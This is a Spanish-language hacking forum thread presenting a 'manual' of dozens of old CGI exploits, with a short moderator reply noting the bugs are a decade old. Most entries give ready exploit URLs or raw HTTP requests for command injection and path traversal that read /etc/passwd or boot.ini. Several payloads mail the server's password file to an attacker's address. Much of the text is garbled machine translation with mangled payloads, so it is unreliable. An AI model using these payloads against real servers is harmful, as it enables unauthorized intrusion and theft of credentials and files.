elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a Git (Primera Parte)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  Manual de Exploits CGI
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Manual de Exploits CGI  (Leído 8,178 veces)
billgay

Desconectado Desconectado

Mensajes: 56


hay 1 bien: el conocimiento. hay 1 mal: ignorancia


Ver Perfil WWW
Manual de Exploits CGI
« en: 28 Enero 2010, 08:18 am »

Este tutorial te mostrará muchos Cgi-Bin

un intro que son los exploits

http://neworder.box.sk/newsread.php?newsid=1351

-<>-

PHF:

Una secuencia de comandos que venían de serie con el popular servidor web Apache también contiene un grave defecto. Hay parámetro incorrectos , por lo tanto,  cualquier comando que desea puede ser ejecutado en el sistema.

Exploit:

http://www.thesite.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

muestra los password del servidor.


-<>-

Test-Cgi

Cualquier persona puede remotamente los archivos en una máquina.

Exploit:

http://www.thesite.com/cgi-bin/test-cgi?*

muestra el contenido del servidor  Cgi directory.

/cgi-bin/test-cgi?/*

mostrará el contenido del directorio de servidores raíz.

CONTENT_TYPE, CONTENT_LENGTH, HTTP_ACCEPT, HTTP_REFERER, PATH_INFO, PATH_TRANSLATED, REQUEST_METHOD, SERVER_PROTOCOL, REMOTE_HOST field.

Tambien se puede utilizar con telnet en puerto 80

GET /cgi-bin/test-cgi?x> /*

-<>-

Fax Survey

Si se instala el paquete de HylaFAX (común en algunas personas mayores distribuciones de Linux), puede enviar comandos arbitrarios ejecutando como el UID del servidor web:

Exploit:

http://www.thesite.com/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd

muestra los password del servidor

-<>-

Netauth

Netauth es una red basada Sistema de gestión de correo electrónico para Windows NT y la mayoría de plataformas UNIX. Este producto contiene un agujero de seguridad que permite a los usuarios remotos descargar archivos locales, incluidos los archivos como / etc / shadow.

Exploit:

http://www.thesite.com/cgi-bin/netauth.cgi?cmd=show&page=../../../../../../../../../etc/passwd

muestra los password del servidor.

-<>-
Calender.pl

La vulnerabilidad permite a usuarios remotos ejecutar comandos arbitrarios en el servidor web con los privilegios del proceso httpd process.

El script calender_admin.pl solicita al usuario un archivo de configuración para modificarlo y  a continuación en un intento de autenticar al usuario, lo pasa a la entrada del usuario directamente a perl open (). Esto puede ser fácilmente explotada para ejecutar código arbitrario de forma remota.
Exploit:

http://www.thesite.com/cgi-bin/calender_admin.pl

Ir a la URL que se traducirá en un nombre de username/password/configuration  de los campos de entrada ignore el nombre de usuario y contraseña, introduzca:


ejemplo:
|ping 127.0.0.1|

y el comando se ejecutara.

-<>-

HTML script

HTML script  tiene una vulnerabilidad en el mismo que le permite acceder a archivos del sistema, presumiblemente cualquier fichero que el usuario del servidor web puede acceder.

Exploit:

http://www.thesite.com/cgi-bin/htmlscript?../../../../etc/passwd

La URL anterior se recibe el archivo de contraseñas del servidor.

-<>-
Finger

- <> --
Finger

Obtenga una lista de direcciones de correo electrónico que encuentra en el lugar (vamos a suponer uno de ellos es "kangaroo@acme.net", y que su dirección de correo electrónico es "your@email.org")

Ir a la Finger Box, y en este tipo (cambia las direcciones de correo electrónico por unas reales):

kangaroo@acme.net; /bin/mail your@email.org < etc/password

Si esto funciona usted tiene el archivo etc / contraseña en su buzón de correo.

-<>-

classifieds.cgi

Anuncios es una script  Cgi libre para el manejo de los anuncios clasificados. Existen múltiples agujeros de seguridad en el que permitir la ejecución remota. En primer lugar, mediante el establecimiento de su dirección de correo electrónico como algo así como "duke@viper.net.au </ etc / contraseña, puede leer archivos de forma remota del servidor.

Además, mediante el establecimiento de las variables ocultas en un formulario html, un usuario remoto puede obligar a comandos arbitrarios a ser ejecutados. Un ejemplo de ello es la modificación de las siguientes variables:

><input type="hidden" name="mailprog" value="/usr/sbin/sendmail">

Cambiar su valor a otro comando hará que el comando alternativo para ser ejecutado.

-<>-
WebGais

WebGais es una interfaz a la herramienta de búsqueda GAIS. Se instala algunos programas en / cgi-bin. La utilidad principal se llama "WebGais" y que la interconexión real con la herramienta de búsqueda.

Se lee la consulta de un formulario de usuario, y luego ejecuta el motor de búsqueda GAIS para esa consulta. El autor trató de proteger el programa utilizando comillas simples alrededor de la consulta cuando se la pasó a un sistema de "comando". Pero se olvidó de un algo muy importante: para quitar las comillas simples de la consulta .

Exploit:

Telnet Target.machine.com  80
/Cgi-bin/webgais POST HTTP/1.0 Content-Length: 85 (sustituir esto con la longitud real de la "explotar" en línea)

query = '; + correo drazvan@pop3.kappa.ro </ etc / passwd; echo' & = salida de Estudiantes de dominio = párrafo

-<>-
Web Sendmail

Websendmail es un cgi-bin que viene con el paquete WebGais, que es una interfaz a la herramienta de búsqueda GAIS. Se trata de un script PERL que lee la entrada de un formulario y lo envía por e-mail al destino especificado.

Exploit:

Telnet Target.machine.com  80
POST / HTTP/1.0 cgi-bin/websendmail
Content-Length: xxx (debería ser reemplazado con la longitud real de la
Cadena que se pasa al servidor, en este caso xxx = 90)
= receptor; + correo your_address@somewhere.org </ etc / passwd; & sender = a & rtnaddr = a & subject = a & contenido = a

-<>-
Aglimpse

Glimpse HTTP es una interfaz a la herramienta de búsqueda Glimpse, escrito en Perl. Un agujero puede permitir la ejecución de cualquier comando en el sistema remoto.

Exploit Ejemplo:

http://www.thesite.com/cgi-bin/aglimpse/80IFS=5; CMD = 5mail5thegnome@nmrc.org <mailto:thegnome@nmrc.org> passwd; eval $ CMD

- <> --
Webcom's Guestbook CGI vulnerability

Webcom's Guestbook CGI vulnerability  para los servidores de Windows NT Web sufre de graves problemas de seguridad que permiten a los usuarios a distancia para ver los archivos de sistema local.

Exploit Ejemplo:

http://www.thesite.com/cgi-bin/rguest.exe?template=full-path-to-filename (para recibir archivos importantes del sistema)

- <> --
Webdist.cgi

Un fallo de seguridad que permite a cualquiera ejecutar comandos arbitrarios con los privilegios del demonio HTTP. (Root or nobody).

Exploit Ejemplo:

http://www.thesite.com/cgi-bin/webdist.cgi

- <> --
Wrap

Este exploit le permite a cualquiera obtener una lista para cualquier directorio con el mode +755


Exploit Ejemplo:

http://www.thesite.com/cgi-bin/wrap

- <> --
PHP.cgi

Un fallo de seguridad que permite a un atacante leer archivos arbitrarios con los privilegios del demonio HTTP (Usually root or nobody)..

Exploit Ejemplo:

http://www.thesite.com/cgi-bin/php.cgi

- <> --
Perl.exe

Este exploit nos permite ejecutar código Perl arbitrario en un PC, a distancia, por supuesto.

Exploit Ejemplo:

http://www.thesite.com/cgi-bin/perl.exe

- <> --
NPH-test-cgi

Un fallo de seguridad que permite que obtiene la lista de los / directorio cgi-bin, descubriendo así que cgis están instalados en la máquina remota.

Ejemplo Exploit: http://www.thesite.com/cgi-bin/NPH-test-cgi

- <> --
NPH-publish.cgi

Un fallo de seguridad que permite a un atacante ejecutar cualquier
los comandos con los privilegios del demonio HTTP.

Exploit Ejemplo:

http://www.thesite.com/cgi-bin/nph-publish.cgi

- <> --
newdsn.exe

Este exploit le permite a cualquier atacante como nosotros la capacidad de crear archivos en cualquier lugar en su sistema si los permisos NTFS no son lo suficientemente estrictos, y se puede utilizar para sobrescribir los DSN de las bases de datos existentes

Ejemplo Exploit: http://www.thesite.com/cgi-bin/scripts/tools/newdsn.exe

- <> --
JJ

Un fallo de seguridad que permite a un atacante ejecutar cualquier
de los comandos con los privilegios del demonio HTTP.

Ejemplo Exploit: http://www.thesite.com/cgi-bin/jj


- <> --
info2www

Un fallo de seguridad que nos permite ejecutar comandos arbitrarios con los privilegios del demonio HTTP. (Por lo general la raíz o nadie).

Ejemplo Exploit: http://www.thesite.com/cgi-bin/info2www

- <> --
Add-password.cgi


Ejemplo Exploit: http://www.thesite.com/cgi-bin/add-password.cgi

- <> --
imagemap.exe

Esta aplicación CGI es vulnerable a un desbordamiento de búfer que permitiría a un usuario remoto. poder ejecutar comandos arbitrarios con los privilegios de los administradores del servidor httpd. (O bien nadie o raíz)

Ejemplo Exploit: http://www.thesite.com/cgi-bin/imagemap.exe

- <> --
dumpenv.pl

Esta vulnerabilidad se da un montón de información sobre la configuración del servidor web

Ejemplo Exploit: http://www.thesite.com/cgi-bin/dumpenv

- <> --
guestbook.pl

Una brecha que nos permita ejecutar comandos arbitrarios con los privilegios del demonio HTTP.

Ejemplo Exploit: http://www.thesite.com/cgi-bin/guestbook.pl

- <> --
LibroDeInvitados.cgi

Una brecha que nos permita ejecutar comandos arbitrarios con los privilegios del demonio HTTP.

Ejemplo Exploit: http://www.thesite.com/cgi-bin/guestbook.cgi

- <> --
Campas

Un  exploit que nos permita ejecutar comandos arbitrarios con los privilegios del demonio HTTP.

Ejemplo Exploit: http://www.thesite.com/cgi-bin/campas

- <> --
scripts

Si el directorio / scripts es navegable (probablemente si no se sabe nada de seguridad), entonces esto nos daría información valiosa sobre scripts que tienen instalado por defecto y también si hay alguna scripts actual, que pueden ser vulnerables

Ejemplo Exploit: http://www.thesite.com/cgi-bin/scripts

- <> --
loadpage.cgi

Este exploit viene con el paquete del 3,0 EZShopper. Podemos abrir los subdirectorios y / o ver algunos contenidos de archivos sensibles, como los archivos de datos de usuario.

Ejemplo Exploit: http://www.thesite.com/cgi-bin/ezshopper/loadpage.cgi?user_id=id&file=/

- <> --
search.cgi

Un error que nos permite ejecutar comandos en el servidor y ver archivos fuera de la ruta de acceso web.

http://www.thesite.com/cgi-bin/search.cgi?user_id=1&database=../../../etc/passwd&template=foo&distinct=1

- <> --
CGI Counter

La popular página web de la versión CGI acceso al  CGI counter version 4.0.7 por George Burgyan permite la ejecución de comandos arbitrarios, debido a la entrada del usuarios. Los comandos se ejecutan con los mismos privilegios que el servidor web, pero otras vulnerabilidades se pueden utilizar para tener acceso de root en un sistema operativo actualizados.

Exploit:

Using straight URL
http://www.example.com/cgi-bin/counterfiglet/nc/f =; eco; w; uname% 20-A; ID
(Esto mostrará el nombre de usuario de un sistema dado)

Al pasar los comandos en una variable:
$ Telnet www.example.com www
GET / cgi-bin/counterfiglet/nc/f =;% sh 20-C% 20 "$ HTTP_X" HTTP/1.0
X: pwd; ls-la / etc; cat / etc / password

$ Telnet www.example.com www
GET / cgi-bin/counter/nl/ord/lang = Inglés (1); sistema ( "$ ENV (HTTP_X)"); HTTP/1.0
X: eco; id; uname-a; w

- <> --
SGI Infosearch

El subsistema de búsqueda de información se utiliza para buscar y navegar casi todos los SIG en la documentación en línea. Una vulnerabilidad ha sido descubierta en Infosearch.Cgi que podría permitir a cualquier usuario remoto para ver los archivos en el sistema vulnerable con los privilegios del usuario "nobody".

- <> --
Poll It

Poll It permite un fácil alojamiento de encuestas en línea en sitios web. Sin embargo, esta CGI también permite a atacantes remotos para leer cualquier archivo legible del mundo en el servidor.

Exploit:

http://www.thesite.com/cgi-bin/pollit/Poll_It_SSI_v2.0.cgi?data_dir=/etc/passwd 00%

La URL anterior sería recuperar el archivo de contraseñas del servidor.

- <> --
Robpoll

Robpoll es un programa basado en Cgi libre de administración.

Exploit:

Primero ir a:

http://www.thesite.com/cgi-bin/robpoll.cgi?Admin

Usted tendrá la opción de cambiar la contraseña. La contraseña por defecto es "Robpoll", dejando esta contraseña tanto, compromete el sistema y sus archivos.

- <> --
Webbanner

Un agujero de seguridad en el CGI webbanner permite a atacantes remotos para ver determinados archivos en el sistema, y posiblemente ejecutar comandos del sistema, así.

Exploit:

http://www.thesite.com/random_banner/index.cgi?image_list=alternative_image.list&html_file=../../../../../etc/passwd

La URL indicada anteriormente recuperar el archivo de contraseñas del servidor.

- <> --
WebWho +

WebWho + es un scblockedript Cgi libre para la ejecución de consultas whois a través de la www. A pesar de que lleva a cabo los controles de los caracteres de escape de Shell en algunos parámetros, se pierde la variable «type» y permite la entrada maliciosos para ser enviados a shell. Es posible ejecutar código arbitrario en un servidor web corriendo WebWho + v1.1 con el ID de usuario del servidor web.

- <> --
FormMail.pl

Una falla grave en el programa CGI popular Formmail.pl permite spammers para enviar mensajes anónimos

Exploit Ejemplo:
http://www.thesite.com/cgi-bin/formmail.pl

- <> --
alibaba.pl

Este exploit permitirá tener un listado de directorio de todos los archivos en el directorio CGI. Esto podría ser utilizado para encontrar los archivos. Pwl y para encontrar más directorios y scripts a explotar.

Ejemplo Exploit: http://www.thesite.com/cgi-bin/alibaba.pl|dir

- <> --
input.bat

Este exploit  le permiten ejecutar comandos arbitrarios

Ejemplo Exploit: http://www.thesite.com/cgi-bin/input.bat?|dir....windows


- <> --
bigconf.cgi

Un fallo de seguridad que nos permite ejecutar comandos arbitrarios con los privilegios del demonio HTTP.

Ejemplo Exploit: http://www.thesite.com/cgi-bin/bigconf.cgi

- <> --

- <> --
tst.bat

Esta falla en tst.bat nos permitiría leer archivos arbitrarios en un sistema remoto

Ejemplo Exploit: http://www.thesite.com/cgi-bin/tst.bat

- <> --
Idq.dll

Este exploit nos permitiría leer archivos arbitrarios en un sistema remoto

Ejemplo Exploit: http://www.thesite.com/query.idq?CiTemplate=../../../somefile.ext

- <> --
FormHandler.cgi

La utilidad FormHandler CGI puede permitirnos descargar cualquier archivo de los sistemas vulnerables.

Ejemplo Exploit: http://www.thesite.com/formhandler.cgi

- <> --
Showcode.asp


Una muestra de Active Server Page (ASP) script instalado por defecto en Microsoft Internet Information Server (IIS) 4.0 nos daría acceso para ver cualquier archivo en el mismo volumen que el servidor web que sea legible por el servidor web.

Ejemplo Exploit: http://www.thesite.com/msadc/Samples/SELECTOR/showcode.asp

- <> --
CodeBrws.asp

Este exploit nos permitiría ver la fuente de cualquier archivo en la raíz web con las extensiones. Asp. Inc. Htm o. Html

Ejemplo Exploit: http://www.thesite.com/iissamples/exair/howitworks/codebrws.asp

- <> --
htimage.exe

Existe un desbordamiento de búfer en el htimage.exe remoto cuando se da la siguiente petición:

Ejemplo Exploit: http://www.thesite.com/cgi-bin/htimage.exe/AAAA [....] AAA? 0,0

- <> --
wguest.exe

La solicitud de http://www.thesite.com/cgi-bin/wguest.exe?template=c:boot.ini devolverá el boot.ini web remota los servidores de archivos

Ejemplo Exploit: http://www.thesite.com/cgi-bin/wguest.exe?template=c:boot.ini

- <> --
uploader.exe


Un fallo de seguridad que le permite cargar cualquier Cgi arbitrario en el servidor, y luego ejecutarlos.

Ejemplo Exploit: http://www.thesite.com/cgi-bin/uploader.exe

- <> --
search97.vts

Este exploit  se puede utilizar para ver de forma remota cualquier archivo en un servidor web.

Ejemplo Exploit: http://www.thesite.com/cgi-bin/search97.vts

- <> --
rguest.exe

Este exploit  volverá con los $ winnt $. Inf.

Ejemplo Exploit: http://www.thesite.com/cgi-bin/rguest.exe?template=c:winntsystem32 $ winnt $. Inf

- <> --
pfdispaly.cgi

Este exploit  nos permita ver los archivos en un sistema vulnerable con los privilegios del usuario
Si se explota, puede permitir a cualquier usuario ver los archivos en un sistema vulnerable con los privilegios del usuario.

Ejemplo Exploit: http / / www.thesite.com / cgi-bin / pfdisplay.cgi

- <> --
Man.sh

Esto permitiría aprovechar todo el que puede ejecutar Cgi navegador web a través de ti ejecutar comandos del sistema con el ID de usuario del servidor web y obtener la salida de ellos en una página web.

Ejemplo Exploit: http://www.thesite.com/cgi-bin/man.sh

- <> --
/ scripts / issadmin / bdir.htr

El bdir.htr archivo es un archivo por defecto de IIS que nos puede dar una gran cantidad de información innecesaria sobre
un sistema de archivos.

http://www.thesite.com/scblockedripts/iisadmin/bdir.htr??c:

- <> --
Count.cgi

Un desbordamiento de búfer puede ser en el programa de Count.cgi, permitiendo a los usuarios http remotos ejecutar comandos arbitrarios en la máquina objetivo.
Ejemplo Exploit: http://www.thesite.com/cgi-bin/Count.cgi

- <> --
CGImail.exe

Una brecha de seguridad que podemos usar para obtener acceso a los confidenciales
de datos o fomentan la escalada de nuestros privilegios.

Ejemplo Exploit: http://www.thesite.com/scblockedripts/CGImail.exe

- <> --
carbo.dll

Este exploit  se puede utilizar para ver de forma remota cualquier archivo en su servidor web.

Ejemplo Exploit: http://www.thesite.com/carbo.dll?icatcommand=file_to_view&catalogname=catalog

- <> --
args.bat

Un fallo de seguridad que permite a un atacante subir archivos arbitrarios en el servidor web remoto.

Ejemplo Exploit: http://www.thesite.com/cgi-bin/args.bat

- <> --
AnyForm2

Este exploit puede ser utilizado por nosotros al correo electrónico la contraseña del servidor web el archivo de nuevo a nosotros.

Ejemplo Exploit: http://www.thesite.com/cgi-bin/AnyForm2

- <> --
get32.exe

Un fallo de seguridad que permite a cualquiera ejecutar comandos arbitrarios con los privilegios del demonio HTTP.
Ejemplo Exploit: http://www.thesite.com/cgi-bin/get32.exe

- <> --
Ews

Un fallo de seguridad que permite a cualquiera ejecutar comandos arbitrarios con los privilegios del demonio HTTP.

Ejemplo Exploit: http://www.thesite.com/cgi-bin/ews

- <> --
exprcalc.cfm

Este exploit nos permitiría ver, eliminar y cualquier subida en un servidor ColdFusion Application Server

Ejemplo Exploit: http://www.thesite.com/cfdocs/expeval/exprcalc.cfm

- <> --
ExAir

IIS viene con el sitio de la muestra ExAir. La página / iissamples / EXAIR / search / advsearch.asp
podría ser utilizado para hacer IIS se bloquea, lo que le impide responder a solicitudes de los clientes legítimos.

Ejemplo Exploit: http://www.thesite.com/iissamples/exair/search/advsearch.asp

- <> --
ExAir

IIS viene con el sitio de la muestra ExAir. La página / iissamples / EXAIR / search / Query.asp
podría ser utilizado para hacer IIS se bloquea, lo que le impide responder a solicitudes de los clientes legítimos.

Ejemplo Exploit: http://www.thesite.com/iissamples/exair/search/query.asp

- <> --
ExAir

IIS viene con el sitio de la muestra ExAir. La página / iissamples / EXAIR / search / search.asp
podría ser utilizado para hacer IIS se bloquea, lo que le impide responder a solicitudes de los clientes legítimos.

Ejemplo Exploit: http://www.thesite.com/iissamples/exair/search/search.asp

- <> --
Altavista

Sería posible leer el contenido de los archivos en la máquina remota mediante el uso de la Altavista búsqueda en la intranet de servicios, y realizar la solicitud a continuación.

Ejemplo Exploit: GET http://www.thesite.com/cgi-bin/query?mss =% 2e/config 2e%

- <> --
input2.bat

Es posible mal uso de este archivo. Bat para hacer que el servidor remoto ejecutar comandos arbitrarios.

Ejemplo Exploit: http://www.thesite.com/cgi-bin/input2.bat?|dir....windows

- <> --
envout.bat

Es posible mal uso de este archivo. Bat para hacer que el servidor remoto ejecutar comandos arbitrarios.

Ejemplo Exploit: http://www.thesite.com/ssi/envout.bat

- <> --
/cd/.. /config/html/cnf_gi.htm

Es posible acceder a la configuración remota AxisStorpoint anfitrión con Este exploit

Ejemplo Exploit: http://www.thesite.com/cd/../config/html/cnf_gi.htm

- <> --
cachemgr.cgi

RedHat Linux 6.0 instala squid cache manager  por defecto con permisos de acceso no restringido. Esta script podría ser utilizado para realizar un escaneo de puertos desde el Cgi-host machine.

Ejemplo Exploit: http://www.thesite.com/cgi-bin/cachemgr.cgi

- <> --
Web raíz remoto

Es posible obtener la ubicación de un directorio de red virtual de un host mediante la emisión de la orden de abajo.

Ejemplo Exploit: GET http://www.thesite.com/cgi-bin/ls HTTP/1.0

- <> --
CGI

Esta es una muy obvio sin explotar. Es el cgi-bin navegable? Suena estúpido, pero es que algunas personas son estúpidas. Recuerde que.

Ejemplo Exploit: http://www.thesite.com/Cgi-Bin

- <> --
cgitest.exe

Existe un desbordamiento de búfer en el cgitest.exe, que nos permitirá ejecutar comandos arbitrarios con los mismos privilegios que el servidor web (raíz o de nadie).

Ejemplo Exploit: http://www.thesite.com/cgi-bin/cgitest.exe

- <> --
ExprCalc.cfm

Para visualizar y borrar cualquier archivo en el sistema de uso de una dirección URL de la siguiente forma siguiente:

Ejemplo Exploit: http://www.thesite.com/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=C:thetargetfile

- <> --
getdrvrs.exe

Obtener los controladores desde el sitio.

Ejemplo Exploit: http://www.thesite.com/scblockedripts/tools/getdrvrs.exe

- <> --
bnbform.cgi

Los usuarios remotos pueden leer ficheros arbitrarios en el sistema de archivos.

Ejemplo Exploit: http://www.thesite.com/Cgi-Bin/bnbform.cgi

- <> --
survey.cgi

Los usuarios remotos pueden ejecutar comandos con privilegios del servidor web

Ejemplo Exploit: http://www.thesite.com/Cgi-bin/survey.cgi

- <> --
.htaccess

Cgi-host machine le permitiría leer archivos protegidos con. Htaccess

http://www.thegnome.com/secure/.htaccess

- <> --
convert.bas

Cgi-host machine le permitirá leer cualquier archivo en el sistema de archivos remoto.

Exploit Ejemplo:
http://thesite.com/scblockedripts/convert.bas?../anythingyouwanttoview


CREDITOS

BLACKACE227

NOTA: ME PODRIAN DECIR CUALES SON LOS QUE FALTAN Y QUE OTRAS PAGIANS ESPECIFICAN INFORMACION SOBRE MAS DETALLADA SOBRE ESTO ES PARA  IR ACTUALIZANDOLO Y HACER UN MANUAL SUPERCOMPLETO SOBRE EL TEMA
« Última modificación: 29 Enero 2010, 04:51 am por fellargasi » En línea

WHK
Moderador Global
***
Desconectado Desconectado

Mensajes: 6.589


Sin conocimiento no hay espíritu


Ver Perfil WWW
Re: Manual de Exploits CGI
« Respuesta #1 en: 28 Enero 2010, 09:50 am »

Gracias fellargasi por esas ganas de ayudar! ojala todos fueramos así, pero sería mejor si pudieras encontrar documentación un poco mas actualizada, esos bugs son de hace mas de 10 años.
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
sitios venta de exploits
Dudas Generales
billgay 2 2,636 Último mensaje 6 Octubre 2020, 23:35 pm
por BloodSharp
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines